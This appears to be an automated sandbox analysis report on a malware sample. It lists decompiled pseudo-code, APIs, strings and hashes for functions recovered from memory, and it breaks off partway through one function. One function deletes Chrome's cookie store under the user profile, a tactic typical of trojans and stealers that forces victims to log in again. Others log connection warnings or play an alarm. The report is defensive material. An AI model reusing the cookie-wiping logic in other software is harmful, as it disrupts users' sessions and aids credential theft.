Function 00749F83, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00749F83(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00742084(_t20,  &_v52, E0077988A(_t20, __eflags, "UserProfile"));
				E00745343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				E00741FC7();
				if(DeleteFileA(E00741F95( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00742084(_t20, _t28);
						E0074A6EF(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00741FC7();
				return _t21;
			}

0x00749f83
0x00749f83
0x00749fa3
0x00749fa8
0x00749fb1
0x00749fc7
0x00749fed
0x00749fef
0x00000000
0x00749fc9
0x00749fd0
0x00749fd3
0x00749fe1
0x00749fe3
0x00749ff4
0x00749ff4
0x00749ff9
0x00749ffe
0x00749fda
0x00749fda
0x00749fda
0x00749fd3
0x0074a006
0x0074a011

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00749FBF
GetLastError.KERNEL32 ref: 00749FC9

Strings

UserProfile, xrefs: 00749F8F
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00749F8A
[Chrome Cookies found, cleared!], xrefs: 00749FEF
[Chrome Cookies not found], xrefs: 00749FE3

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: ff011247accdbaddb48276c44a964049e455da479e8f851ffbe25db48bb9984b
Instruction ID: 88f7a08e65848fc76640cd1201745fda3121020bd019b164a17c6c4f62f42ec2
Opcode Fuzzy Hash: ff011247accdbaddb48276c44a964049e455da479e8f851ffbe25db48bb9984b
Instruction Fuzzy Hash: D501D671685109A78F08B774EC5F8BF7B24B9133007900229F902D61E2FF1D5A4AC6D2

Uniqueness

Uniqueness Score: -1.00%

Function 0074511B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0074511B(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00742084(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00742084(_t17, _t24 - 0x18, "[WARNING]");
					E00756C80(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}

0x0074511f
0x00745125
0x00000000
0x00745183
0x0074512b
0x0074512d
0x00745137
0x00745146
0x0074514b
0x00745150
0x00745162
0x00745165
0x00745170
0x00745179
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,007AC138,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745159
SetEvent.KERNEL32(?,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745165
WaitForSingleObject.KERNEL32(?,000000FF,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745170
CloseHandle.KERNEL32(?,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745179

Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A

Strings

[WARNING], xrefs: 00745141
Connection KeepAlive disabled, xrefs: 00745132

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive disabled$[WARNING]
API String ID: 2993684571-804309475
Opcode ID: 7a9e075594e558670750ab38933c5a0866a33c5ac3ac245f243b165d0829716f
Instruction ID: bb3248b71820754cc2bd4c10bcb6da15176a0fd1ddb8d9c0f438129915a5ecf3
Opcode Fuzzy Hash: 7a9e075594e558670750ab38933c5a0866a33c5ac3ac245f243b165d0829716f
Instruction Fuzzy Hash: 17F0F6715003447FDF103BB49C0EA767F98EB02324F40451AFD42C25B2CBB9985187A2

Uniqueness

Uniqueness Score: -1.00%

Function 00756737, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00756737(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				E00742084(_t7, _t15 - 0x18, "Alarm has been triggered!");
				E00742084(_t7, _t16 - 0x18, "[ALARM]");
				E00756C80(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}

0x00756739
0x0075673c
0x00756745
0x00756754
0x00756759
0x00756777
0x0075677e
0x0075678b

APIs

Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00756769
PlaySoundW.WINMM(00000000,00000000), ref: 00756777
Sleep.KERNEL32(00002710), ref: 0075677E
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00756787

Strings

Alarm has been triggered!, xrefs: 00756740
[ALARM], xrefs: 0075674F

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm has been triggered!$[ALARM]
API String ID: 614609389-1190268461
Opcode ID: cab040b1ee9ebbda57d0427d1ee21146e4e1320d3e21439fed66ff0ff6ccddf7
Instruction ID: 40a50aa0a8ec30a80a3f55bbc41079bc2c688a371a7c992c909fe817b29e6d9a
Opcode Fuzzy Hash: cab040b1ee9ebbda57d0427d1ee21146e4e1320d3e21439fed66ff0ff6ccddf7
Instruction Fuzzy Hash: A7E0D822B00020775520337A6C0FC6F3D28DFC3B20741415BFA045B192CD480812C3F3

Uniqueness

Uniqueness Score: -1.00%

Function 00775799, Relevance: 9.3, APIs: 6, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00775799(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E0077A504();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0077695D();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E0077A504();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0077695D();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E0077A504();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E0078309E(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E007828D3( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E007828FF( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E0078292B( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0077C6D7();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E00790C70(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00790BC0(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0079
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E00790C70(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00790BC0(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E00790C70(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00790BC0(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E007830EF(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0077C6D7();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E007830EF(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0077C6D7();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0077698A();
				asm("int3");
				_push(_t155);
				_t69 = E0077C672(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E00775799(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}

0x00775799
0x007757a2
0x007757a7
0x007757a9
0x007757b0
0x007757b1
0x007757b3
0x00000000
0x007757b8
0x007757bc
0x007757c4
0x007757c5
0x007757c7
0x007757ca
0x007757cc
0x007757ce
0x007757d5
0x007757d6
0x007757d8
0x007757dd
0x0077580e
0x00000000
0x0077580e
0x007757e1
0x007757e4
0x007757e7
0x007757e9
0x00775801
0x00775801
0x00775808
0x00775809
0x0077580b
0x0077580d
0x00000000
0x0077580d
0x007757eb
0x007757ed
0x00000000
0x00000000
0x007757ed
0x007757f1
0x007757f2
0x007757f5
0x007757f7
0x00000000
0x00000000
0x007757f9
0x007757ff
0x00000000
0x00000000
0x007757ff
0x00775814
0x0077581c
0x00775820
0x00775823
0x00775826
0x0077582b
0x0077582c
0x0077582e
0x00775838
0x0077583d
0x0077583e
0x00775840
0x0077584a
0x0077584f
0x00775850
0x00775852
0x00775858
0x0077585b
0x0077585d
0x0077585f
0x007758e0
0x007758e0
0x007758e1
0x007758e2
0x007758e9
0x007758eb
0x00000000
0x00000000
0x007758f1
0x007758f7
0x007758f8
0x007758fa
0x007758fc
0x00775918
0x00775918
0x0077591b
0x0077591b
0x0077591c
0x00775922
0x00775926
0x0077592b
0x0077592d
0x0077592f
0x00775934
0x00775937
0x00775939
0x00775939
0x00775942
0x00775949
0x0077594b
0x0077594e
0x0077594f
0x00775955
0x00775959
0x0077595e
0x00775961
0x00775963
0x00775968
0x0077596b
0x0077596e
0x0077596e
0x00775977
0x0077597e
0x00775980
0x00775983
0x00775984
0x0077598a
0x0077598e
0x00775993
0x00775996
0x00775998
0x0077599d
0x007759a0
0x007759a3
0x007759a3
0x007759b1
0x007759b3
0x007759b5
0x007759e2
0x007759e2
0x007759e8
0x007759ef
0x007759f0
0x007759f3
0x007759f3
0x007759f6
0x007759f9
0x007759fb
0x00000000
0x00000000
0x00775a00
0x00775a07
0x00775a0a
0x00775a10
0x00775a13
0x00000000
0x007759b7
0x007759b7
0x007759bd
0x007759bd
0x007759c4
0x007759c5
0x007759c8
0x007759c8
0x007759c8
0x007759cb
0x007759ce
0x007759ce
0x007759ce
0x007759ce
0x007759d1
0x007759d1
0x00000000
0x007759d1
0x007759b9
0x007759bb
0x007759d8
0x007759da
0x00000000
0x00000000
0x007759dc
0x00000000
0x00000000
0x007759de
0x007759e0
0x00000000
0x00000000
0x00000000
0x007759e0
0x00000000
0x007759bb
0x007759b5
0x007758fe
0x007758ff
0x00775905
0x00775907
0x00000000
0x00000000
0x0077590c
0x0077590f
0x00000000
0x0077590f
0x00775861
0x0077586b
0x0077586d
0x0077586e
0x00775870
0x00000000
0x00000000
0x00775872
0x0077587c
0x0077587f
0x00775885
0x00775886
0x00775888
0x0077588b
0x0077588c
0x0077588f
0x00775896
0x00775898
0x00000000
0x00000000
0x0077589e
0x007758a1
0x00000000
0x00000000
0x007758a7
0x007758a8
0x007758ae
0x007758b0
0x00000000
0x00000000
0x007758b9
0x007758ba
0x007758c0
0x007758c1
0x007758c4
0x007758c5
0x007758cc
0x007758ce
0x00000000
0x00000000
0x007758d4
0x00000000
0x007758d4
0x00775874
0x0077587a
0x00000000
0x00000000
0x00000000
0x0077587a
0x00775863
0x00775869
0x00000000
0x00000000
0x00000000
0x00775869
0x00775852
0x00775840
0x00775a18
0x00775a19
0x00775a1a
0x00775a1b
0x00775a1c
0x00775a1d
0x00775a22
0x00775a28
0x00775a29
0x00775a2e
0x00775a30
0x00775a32
0x00775a34
0x00775a38
0x00775a40
0x00775a45
0x00775a45
0x00000000
0x00775a45
0x00775a49

APIs

__allrem.LIBCMT ref: 00775926
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00775942
__allrem.LIBCMT ref: 00775959
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00775977
__allrem.LIBCMT ref: 0077598E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007759AC

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
Instruction ID: a14371145118c894041c7bdcd54d34cf381385deec0446de36f3078b937047fe
Opcode Fuzzy Hash: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
Instruction Fuzzy Hash: 7D81F972600F06DBEF20AB78CC45B6A73E49F417B4F24C52AF519D6681E7B8E9008B91

Uniqueness

Uniqueness Score: -1.00%

Function 0077F14E, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0077F14E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E0077AE14( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E0077F348(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E007801F5(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E0077AE14(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E0077E4D0(_t97, _t103, _t120, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E0077698A();
							asm("int3");
							E0076FB60(0x7a8270, 0x1c);
							_t130 = _a4;
							_t75 = E0077F14E(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E00781CE2(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E0077B53B( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E0077F98C(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E0077B53B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E0077F0DD(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E007801F5( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x7aa9a4 & 0x00000001;
												if(( *0x7aa9a4 & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E007801F5( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E0077F33F();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E007801F5(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E0077698A();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E0076FBA6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E0077E4D0(__ebx, _t101, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}

0x0077f14e
0x0077f14e
0x0077f153
0x0077f158
0x0077f168
0x0077f169
0x0077f172
0x0077f17a
0x0077f17f
0x0077f182
0x0077f184
0x0077f190
0x0077f19a
0x0077f19d
0x0077f19e
0x0077f1a0
0x0077f1d1
0x0077f1d2
0x0077f1d8
0x00000000
0x0077f1a2
0x0077f1ac
0x0077f1b1
0x0077f1b4
0x0077f1b6
0x0077f1cf
0x00000000
0x0077f1b8
0x0077f1b8
0x0077f1bb
0x00000000
0x0077f1bd
0x0077f1bd
0x0077f1c0
0x00000000
0x0077f1c2
0x00000000
0x0077f1c2
0x0077f1c0
0x0077f1bb
0x0077f1b6
0x0077f186
0x0077f186
0x0077f189
0x0077f1e0
0x0077f1e0
0x0077f1e1
0x0077f1e2
0x0077f1e3
0x0077f1e5
0x0077f1ea
0x0077f1f2
0x0077f1fa
0x0077f1fe
0x0077f204
0x0077f205
0x0077f207
0x0077f209
0x0077f212
0x0077f217
0x0077f21d
0x0077f220
0x0077f223
0x0077f228
0x0077f237
0x0077f23c
0x0077f23f
0x0077f241
0x0077f25b
0x0077f268
0x0077f26a
0x0077f26c
0x00000000
0x0077f26e
0x0077f26e
0x0077f271
0x0077f274
0x0077f27f
0x0077f282
0x0077f287
0x0077f28a
0x0077f28c
0x0077f2af
0x0077f2af
0x0077f2b4
0x0077f2b9
0x0077f2ba
0x0077f2be
0x0077f2c4
0x0077f2c7
0x0077f2c9
0x0077f2cd
0x0077f2d1
0x0077f2d7
0x0077f2dc
0x0077f2dd
0x0077f2e2
0x0077f2e2
0x0077f2e2
0x0077f2d1
0x0077f2e5
0x0077f2e8
0x0077f2ef
0x0077f2f1
0x0077f2f8
0x0077f2fe
0x0077f300
0x0077f302
0x0077f306
0x0077f307
0x0077f30d
0x0077f313
0x0077f313
0x0077f313
0x0077f313
0x0077f307
0x0077f300
0x0077f2f8
0x0077f31b
0x0077f31d
0x0077f324
0x0077f328
0x0077f32f
0x0077f28e
0x0077f28e
0x0077f291
0x0077f298
0x0077f298
0x0077f299
0x0077f29a
0x0077f29b
0x0077f29c
0x00000000
0x0077f293
0x0077f293
0x0077f296
0x0077f29f
0x0077f2a1
0x00000000
0x0077f2a3
0x0077f2a4
0x00000000
0x0077f2a9
0x00000000
0x00000000
0x00000000
0x0077f296
0x0077f291
0x0077f28c
0x0077f243
0x0077f243
0x0077f246
0x0077f24d
0x0077f24d
0x0077f24e
0x0077f24f
0x0077f250
0x0077f251
0x0077f252
0x0077f252
0x0077f248
0x0077f248
0x0077f24b
0x00000000
0x00000000
0x0077f24b
0x0077f257
0x0077f259
0x00000000
0x00000000
0x00000000
0x00000000
0x0077f259
0x0077f20b
0x0077f20b
0x0077f20b
0x0077f33b
0x0077f18b
0x0077f18b
0x0077f18e
0x00000000
0x00000000
0x00000000
0x00000000
0x0077f18e
0x0077f189
0x0077f15a
0x0077f15f
0x0077f1dc
0x0077f1df
0x0077f1df

APIs

__cftoe.LIBCMT ref: 0077F17A
__cftoe.LIBCMT ref: 0077F1AC

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 136b1d6672bdedd2ab766fc2b6117e00bae104701dff573f5fcd35fdd8a3d127
Instruction ID: f6f5c75c97aca194b6bf98089bff4ba2d350e25963a29f8df1032de980eb359e
Opcode Fuzzy Hash: 136b1d6672bdedd2ab766fc2b6117e00bae104701dff573f5fcd35fdd8a3d127
Instruction Fuzzy Hash: 7251EA76900205EBDF249B68CD45FAE77A9BF493B0F50C139F91DD6182DB3DD9008A64

Uniqueness

Uniqueness Score: -1.00%

Function 00748C71, Relevance: 9.2, APIs: 6, Instructions: 168
sleepCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00748C71(void* __ecx, long __edx) {
				char _v1028;
				char _v1040;
				char _v1064;
				char _v1076;
				void* _v1080;
				void* _v1088;
				void* _v1092;
				char _v1100;
				char _v1124;
				void* _v1132;
				char _v1136;
				void* _v1152;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t34;
				char* _t36;
				void* _t38;
				int _t42;
				void* _t49;
				void* _t53;
				void* _t65;
